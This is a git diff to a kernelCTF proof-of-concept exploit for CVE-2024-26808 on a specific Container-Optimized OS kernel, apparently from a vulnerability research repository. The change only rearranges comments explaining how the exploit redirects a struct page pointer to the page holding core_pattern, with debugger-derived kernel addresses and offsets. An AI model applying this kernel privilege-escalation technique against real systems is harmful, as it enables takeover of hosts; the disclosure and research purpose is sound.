diff --git a/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c b/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c
index bc9bf00f..0a1f6df9 100644
--- a/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c
@@ -705,15 +705,18 @@ int main(int argc, char **argv)
 msgrcv(msqid[i + 0x2000], &msg, 0x1000 - 0x30 + 0xc0 - 0x8, 6, 0);
 // modify struct page that will represent of `core_pattern`'s page
+ // p->page was originally pointing vdso_image_64.data.
+ // the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x863000
+ // every 4096 byte page, there is a 64 byte struct page* stored in vmemmap,
+ // so to calculate the difference between struct page* addresses, you have to do: 0x863000 / 4096 * 64 which equals to 0x863000 >> 6
+
 // gef➤ p vdso_image_64.data
 // $5 = (void *) 0xffffffff82d3b000
 // gef➤ p &core_pattern
 // $6 = (char (*)[128]) 0xffffffff8359e7a0
 // gef➤ p 0xffffffff8359e000-0xffffffff82d3b000
 // $7 = 0x863000
- // the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x863000
- // every 4096 byte page, there is a 64 byte struct page* stored in vmemmap,
- // so to calculate the difference between struct page* addresses, you have to do: 0x863000 / 4096 * 64 which equals to 0x863000 >> 6
+
 p->page += (0x863000 >> 6);
 // core_pattern is 0xffffffff8359e7a0, so 0x7a0 is the offset within core_pattern's page.
 // Since p->len == 1, we need to subtract one on p->offset